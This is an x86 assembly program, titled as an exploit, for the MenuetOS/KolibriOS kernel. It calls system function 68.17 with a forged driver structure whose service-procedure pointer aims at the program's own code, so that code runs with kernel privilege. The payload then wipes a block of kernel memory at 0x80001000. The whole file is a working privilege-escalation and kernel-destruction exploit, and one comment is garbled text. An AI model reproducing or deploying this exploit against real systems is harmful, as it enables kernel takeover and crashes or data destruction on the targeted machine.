exploit_68_17.asm

use32
        db      'MENUET01'
        dd      1, start, i_end, mem, mem, 0, 0
start:
        mov     eax, 68
        mov     ebx, 17
        mov     ecx, IOCTL
        int     0x40            ;; call aeyrnbjy in driver
        mov     eax, -1
        int     0x40

IOCTL:
        dd      fake_handler        ;pointer on fake structure driver
        dd      0
        dd      0
        dd      0
        dd      0
        dd      0

fake_handler:
        rb      16
        dd      ' SRV'          ; const for kernel
        dd      48 ;sizeof.SRV  ; const for kernel
        dd      0
        dd      0
        dd      0
        dd      0
        dd      my_code      ; service_proc
        dd      my_code      ;
my_code:                 ;stdcall , 1 parameter(pointer to IOCTL)

        mov     eax, 0
        mov     edi, 0x80001000
        mov     ecx, 0x5000
        rep stosd


        ret
i_end:
        rb   256
mem: